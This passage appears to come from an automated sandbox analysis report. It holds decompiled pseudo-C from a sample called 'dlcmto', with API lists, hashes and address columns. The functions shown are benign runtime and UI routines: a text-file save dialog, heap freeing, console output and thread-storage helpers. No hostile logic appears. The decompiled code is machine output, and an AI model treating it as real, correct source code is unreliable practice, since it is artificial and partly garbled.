                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 512f937a422be195d953bbd487a043cee3391135027fdd9fc0f620fac0758011
                                          • Instruction ID: 069a0828954e84dedff2a3810d89bda81e3d7832bd2b159bccdceaa634be0aa3
                                          • Opcode Fuzzy Hash: 512f937a422be195d953bbd487a043cee3391135027fdd9fc0f620fac0758011
                                          • Instruction Fuzzy Hash: 4D21AB31E05311EBDFBF8A68EC41B1A3B5A5F45660F2505A2FD36BB181D730E90086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01191000 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E01191000() {
				char _v532;
				intOrPtr _t21;
				intOrPtr _t22;
				WCHAR* _t27;
				int _t35;
				struct tagOFNA* _t38;
				void* _t40;

				_t35 = GetWindowTextLengthW( *0x11a7abc);
				if(SendMessageW( *0x11a7abc, 0xb8, 0, 0) == 0 || _t35 == 0 ||  *0x11a7f40 != 0) {
					return 1;
				} else {
					_pop(_t37);
					asm("xorps xmm0, xmm0");
					_t38 = _t40 - 0x260;
					asm("movups [esi+0x10], xmm0");
					asm("movups [esi+0x20], xmm0");
					asm("movups [esi+0x30], xmm0");
					asm("movups [esi+0x40], xmm0");
					 *((intOrPtr*)(_t38 + 0x54)) = 0;
					 *((intOrPtr*)(_t38 + 0x50)) = 0;
					_t27 =  &_v532;
					lstrcpyW(_t27, L"*.txt");
					 *_t38 = 0x58;
					_t21 =  *0x11a7ab4; // 0x0
					 *((intOrPtr*)(_t38 + 4)) = _t21;
					_t22 =  *0x11a7ab0; // 0x0
					 *((intOrPtr*)(_t38 + 8)) = _t22;
					 *((intOrPtr*)(_t38 + 0xc)) = 0x11a8354;
					 *(_t38 + 0x1c) = _t27;
					 *((intOrPtr*)(_t38 + 0x20)) = 0;
					 *((intOrPtr*)(_t38 + 0x34)) = 0x880866;
					 *((intOrPtr*)(_t38 + 0x44)) = E011910D6;
					 *((intOrPtr*)(_t38 + 0x48)) = 0x190;
					 *((intOrPtr*)(_t38 + 0x3c)) = 0x11a0026;
					 *0x11a8818 =  *0x11a8350;
					 *0x11a881c = 0;
					return 0 | GetSaveFileNameW(_t38) != 0x00000000;
				}
			}










                                          0x0119100d
                                          0x01191026
                                          0x01191040
                                          0x01191036
                                          0x01191036
                                          0x01191250
                                          0x01191253
                                          0x01191255
                                          0x01191259
                                          0x0119125d
                                          0x01191261
                                          0x01191267
                                          0x0119126a
                                          0x0119126d
                                          0x01191277
                                          0x0119127d
                                          0x01191283
                                          0x01191288
                                          0x0119128b
                                          0x01191290
                                          0x01191293
                                          0x0119129a
                                          0x0119129d
                                          0x011912a0
                                          0x011912a7
                                          0x011912ae
                                          0x011912b5
                                          0x011912c1
                                          0x011912c6
                                          0x011912e5
                                          0x011912e5

                                          APIs
                                          • GetWindowTextLengthW.USER32 ref: 01191007
                                          • SendMessageW.USER32(000000B8,00000000,00000000), ref: 0119101E
                                          • lstrcpyW.KERNEL32 ref: 01191277
                                          • GetSaveFileNameW.COMDLG32 ref: 011912CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileLengthMessageNameSaveSendTextWindowlstrcpy
                                          • String ID: *.txt$txt
                                          • API String ID: 4130679656-571010898
                                          • Opcode ID: 96c90ef50f27768cfd3f3cccfc094ce4330e9cc8345439fd01c59f39c08f9530
                                          • Instruction ID: a4c51a404c45b0fdfc7a139966b0749f5cb86a7018d18f7137c9f49bd2117d12
                                          • Opcode Fuzzy Hash: 96c90ef50f27768cfd3f3cccfc094ce4330e9cc8345439fd01c59f39c08f9530
                                          • Instruction Fuzzy Hash: C421B075900780DFD378CF29EA44563BFF4FB88314B848A2EE8A6C2A54D771A5C4CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197063 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197063(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E01197147(_t45, 7);
					E01197147(_t45 + 0x1c, 7);
					E01197147(_t45 + 0x38, 0xc);
					E01197147(_t45 + 0x68, 0xc);
					E01197147(_t45 + 0x98, 2);
					E011963FE( *((intOrPtr*)(_t45 + 0xa0)));
					E011963FE( *((intOrPtr*)(_t45 + 0xa4)));
					E011963FE( *((intOrPtr*)(_t45 + 0xa8)));
					E01197147(_t45 + 0xb4, 7);
					E01197147(_t45 + 0xd0, 7);
					E01197147(_t45 + 0xec, 0xc);
					E01197147(_t45 + 0x11c, 0xc);
					E01197147(_t45 + 0x14c, 2);
					E011963FE( *((intOrPtr*)(_t45 + 0x154)));
					E011963FE( *((intOrPtr*)(_t45 + 0x158)));
					E011963FE( *((intOrPtr*)(_t45 + 0x15c)));
					return E011963FE( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                          0x01197069
                                          0x0119706e
                                          0x01197077
                                          0x01197082
                                          0x0119708d
                                          0x01197098
                                          0x011970a6
                                          0x011970b1
                                          0x011970bc
                                          0x011970c7
                                          0x011970d5
                                          0x011970e3
                                          0x011970f4
                                          0x01197102
                                          0x01197110
                                          0x0119711b
                                          0x01197126
                                          0x01197131
                                          0x00000000
                                          0x01197141
                                          0x01197146

                                          APIs
                                            • Part of subcall function 01197147: _free.LIBCMT ref: 0119716C
                                          • _free.LIBCMT ref: 011970B1
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 011970BC
                                          • _free.LIBCMT ref: 011970C7
                                          • _free.LIBCMT ref: 0119711B
                                          • _free.LIBCMT ref: 01197126
                                          • _free.LIBCMT ref: 01197131
                                          • _free.LIBCMT ref: 0119713C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: bbc1a6c505bc259f1e6dec9077c48e37d314695afe771bd27229316765e8b9d2
                                          • Instruction ID: cab00e4af23cdaa4747577f62615e844cf9e6ae3e23013006559aacabd448f4e
                                          • Opcode Fuzzy Hash: bbc1a6c505bc259f1e6dec9077c48e37d314695afe771bd27229316765e8b9d2
                                          • Instruction Fuzzy Hash: 6F114FB1550B4ABBEF24BBB0CC05FCB779FDF54B04F801839E2AD66090DB65B5148A50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119AD5F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0119AD5F(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x11a7210; // 0xbb40e64e
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x11a9458 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E01195C6A( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x11a9458 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x11a7968)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x11a9458 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x11a7968)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x11a9458 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E01192350( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x11a9458 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E0119CDBC(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E011986B8(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E0119717F(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x11a9458 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x11a9458 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x11a9458 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E0119C0F0( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E0119C0F0();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E01191F25(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}






















































































                                          0x0119ad6a
                                          0x0119ad71
                                          0x0119ad74
                                          0x0119ad79
                                          0x0119ad81
                                          0x0119ad84
                                          0x0119ad88
                                          0x0119ad8b
                                          0x0119ad95
                                          0x0119ad9f
                                          0x0119ada1
                                          0x0119ada4
                                          0x0119ada7
                                          0x0119adad
                                          0x0119adaf
                                          0x0119adb6
                                          0x0119adc3
                                          0x0119adc4
                                          0x0119adc7
                                          0x0119adca
                                          0x0119adcb
                                          0x0119adcc
                                          0x0119adcf
                                          0x0119add4
                                          0x0119b0e0
                                          0x0119b0e0
                                          0x0119adda
                                          0x0119adda
                                          0x0119addd
                                          0x0119addf
                                          0x0119ade5
                                          0x0119ade8
                                          0x0119adef
                                          0x0119adf6
                                          0x0119adff
                                          0x00000000
                                          0x00000000
                                          0x0119ae05
                                          0x0119ae0b
                                          0x0119ae0d
                                          0x0119ae0f
                                          0x0119ae12
                                          0x0119ae17
                                          0x0119ae1b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119ae1b
                                          0x0119ae20
                                          0x0119ae23
                                          0x0119ae25
                                          0x0119ae2a
                                          0x0119aedc
                                          0x0119aedd
                                          0x0119aee0
                                          0x0119aee2
                                          0x0119b090
                                          0x0119b092
                                          0x00000000
                                          0x0119b094
                                          0x0119b094
                                          0x0119b097
                                          0x0119b09a
                                          0x0119b0a3
                                          0x0119b0a6
                                          0x0119b0a7
                                          0x0119b0ab
                                          0x0119b0ae
                                          0x0119b0ae
                                          0x00000000
                                          0x0119b0b2
                                          0x0119aee8
                                          0x0119aee8
                                          0x0119aeed
                                          0x0119aef0
                                          0x0119aef6
                                          0x0119aefc
                                          0x0119af05
                                          0x0119af08
                                          0x0119af08
                                          0x0119af09
                                          0x0119af0a
                                          0x0119af0d
                                          0x0119af0e
                                          0x00000000
                                          0x0119af0e
                                          0x0119ae30
                                          0x0119ae3f
                                          0x0119ae40
                                          0x0119ae43
                                          0x0119ae45
                                          0x0119ae4a
                                          0x0119b05b
                                          0x0119b05d
                                          0x0119b05f
                                          0x0119b062
                                          0x0119b067
                                          0x0119b070
                                          0x0119b073
                                          0x0119b074
                                          0x0119b078
                                          0x0119b07b
                                          0x0119b07e
                                          0x0119b07e
                                          0x0119b082
                                          0x0119b082
                                          0x0119b082
                                          0x0119b085
                                          0x0119b085
                                          0x0119b085
                                          0x0119b087
                                          0x0119b087
                                          0x0119b08b
                                          0x0119ae50
                                          0x0119ae50
                                          0x0119ae54
                                          0x0119ae56
                                          0x0119ae59
                                          0x0119ae5c
                                          0x0119ae60
                                          0x0119ae61
                                          0x0119ae65
                                          0x0119ae65
                                          0x0119ae68
                                          0x0119ae6d
                                          0x0119ae79
                                          0x0119ae7e
                                          0x0119ae81
                                          0x0119ae81
                                          0x0119ae86
                                          0x0119ae88
                                          0x0119ae8b
                                          0x0119ae8d
                                          0x0119ae90
                                          0x0119ae93
                                          0x0119ae96
                                          0x0119ae9e
                                          0x0119aea2
                                          0x0119aea6
                                          0x0119aea6
                                          0x0119aeac
                                          0x0119aeb2
                                          0x0119aeb5
                                          0x0119aebd
                                          0x0119aec4
                                          0x0119aec8
                                          0x0119aec9
                                          0x0119aecc
                                          0x0119aecd
                                          0x0119af11
                                          0x0119af11
                                          0x0119af15
                                          0x0119af16
                                          0x0119af1b
                                          0x0119af21
                                          0x00000000
                                          0x0119af27
                                          0x0119af2b
                                          0x0119afb4
                                          0x0119afbb
                                          0x0119afc3
                                          0x0119afcb
                                          0x0119afd0
                                          0x0119afd3
                                          0x0119afd8
                                          0x00000000
                                          0x0119afde
                                          0x0119aff3
                                          0x0119b0d7
                                          0x0119b0dd
                                          0x00000000
                                          0x0119aff9
                                          0x0119b002
                                          0x0119b004
                                          0x0119b00a
                                          0x00000000
                                          0x0119b010
                                          0x0119b014
                                          0x0119b04a
                                          0x0119b04d
                                          0x00000000
                                          0x0119b053
                                          0x0119b053
                                          0x00000000
                                          0x0119b053
                                          0x0119b016
                                          0x0119b018
                                          0x0119b01a
                                          0x0119b033
                                          0x00000000
                                          0x0119b039
                                          0x0119b03d
                                          0x00000000
                                          0x0119b043
                                          0x0119b043
                                          0x0119b046
                                          0x0119b047
                                          0x00000000
                                          0x0119b047
                                          0x0119b03d
                                          0x0119b033
                                          0x0119b014
                                          0x0119b00a
                                          0x0119aff3
                                          0x0119afd8
                                          0x0119af21
                                          0x0119ae4a
                                          0x00000000
                                          0x0119af32
                                          0x0119af32
                                          0x0119af35
                                          0x0119af39
                                          0x0119af3c
                                          0x0119af5e
                                          0x0119af61
                                          0x0119af66
                                          0x0119af6a
                                          0x0119af6e
                                          0x0119af9c
                                          0x0119af9e
                                          0x00000000
                                          0x0119af70
                                          0x0119af70
                                          0x0119af73
                                          0x0119af76
                                          0x0119af79
                                          0x0119b0b4
                                          0x0119b0b7
                                          0x0119b0ba
                                          0x0119b0c4
                                          0x0119b0cf
                                          0x0119b0d4
                                          0x00000000
                                          0x0119af7f
                                          0x0119af86
                                          0x0119af8b
                                          0x0119af8e
                                          0x0119af91
                                          0x00000000
                                          0x0119af97
                                          0x0119af97
                                          0x00000000
                                          0x0119af97
                                          0x0119af91
                                          0x0119af79
                                          0x0119af3e
                                          0x0119af42
                                          0x0119af45
                                          0x0119af4a
                                          0x0119af50
                                          0x0119af52
                                          0x0119af59
                                          0x0119af9f
                                          0x0119afa2
                                          0x0119afa3
                                          0x0119afa8
                                          0x0119afab
                                          0x0119afae
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119afae
                                          0x00000000
                                          0x0119af3c
                                          0x0119addd
                                          0x0119b0e3
                                          0x0119b0e3
                                          0x0119b0e5
                                          0x0119b0e8
                                          0x0119b0e8
                                          0x0119b0e8
                                          0x0119b0e8
                                          0x0119b0fa
                                          0x0119b0fc
                                          0x0119b0fd
                                          0x0119b0fe
                                          0x0119b108

                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 0119ADA7
                                          • __fassign.LIBCMT ref: 0119AF86
                                          • __fassign.LIBCMT ref: 0119AFA3
                                          • WriteFile.KERNEL32(?,01196CD1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0119AFEB
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0119B02B
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0119B0D7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          • Opcode ID: 421e016fb538bc3e0d866618f31269fc3a1bfa2e5daedf2b1fd32c8ffb95227d
                                          • Instruction ID: 4bab9b2299cdaeab4ceab809a90101d84d4c30cb72844d9dea71d3b53b176b20
                                          • Opcode Fuzzy Hash: 421e016fb538bc3e0d866618f31269fc3a1bfa2e5daedf2b1fd32c8ffb95227d
                                          • Instruction Fuzzy Hash: 33D1CC75D042589FCF19CFA8D8809EDBBB5FF48314F28416AE865BB341D731AA46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01194AA8 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01194AA8(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x11a7224 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0119A38C(_t13,  *0x11a7224);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E0119A3C7(_t14,  *0x11a7224, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0119A30B();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E0119A3C7(_t18,  *0x11a7224, 0);
								} else {
									_t8 = E0119A3C7(_t18,  *0x11a7224, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E01194B56(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                          0x01194aa8
                                          0x01194aaf
                                          0x01194ac2
                                          0x01194ac9
                                          0x01194acb
                                          0x01194acf
                                          0x01194ae8
                                          0x01194ae8
                                          0x01194ad1
                                          0x01194ad3
                                          0x01194ae6
                                          0x01194aed
                                          0x01194af6
                                          0x01194af9
                                          0x01194afc
                                          0x01194b10
                                          0x01194b10
                                          0x01194b19
                                          0x01194afe
                                          0x01194b05
                                          0x01194b0b
                                          0x01194b0e
                                          0x01194b22
                                          0x01194b24
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01194b0e
                                          0x01194b27
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01194ae6
                                          0x01194ad3
                                          0x01194b2f
                                          0x01194b39
                                          0x01194ab1
                                          0x01194ab3
                                          0x01194ab3

                                          APIs
                                          • GetLastError.KERNEL32(?,?,01194A9F,01192108,01191C90), ref: 01194AB6
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01194AC4
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01194ADD
                                          • SetLastError.KERNEL32(00000000,01194A9F,01192108,01191C90), ref: 01194B2F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 59d07bc058e0dba7d65282d9e851ae6a9f2b3bf409fccab12914932279159f12
                                          • Instruction ID: bc7cb81294f33f21f57a983be35afc7445e09b8b8de65563a9a947d5b4f3c99e
                                          • Opcode Fuzzy Hash: 59d07bc058e0dba7d65282d9e851ae6a9f2b3bf409fccab12914932279159f12
                                          • Instruction Fuzzy Hash: C701F73220D2135EEF3D29797E84A2B3ED4DF15179720023AF532424D1EF629D465284
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01192CE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 25%
                                          			E01192CE1(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
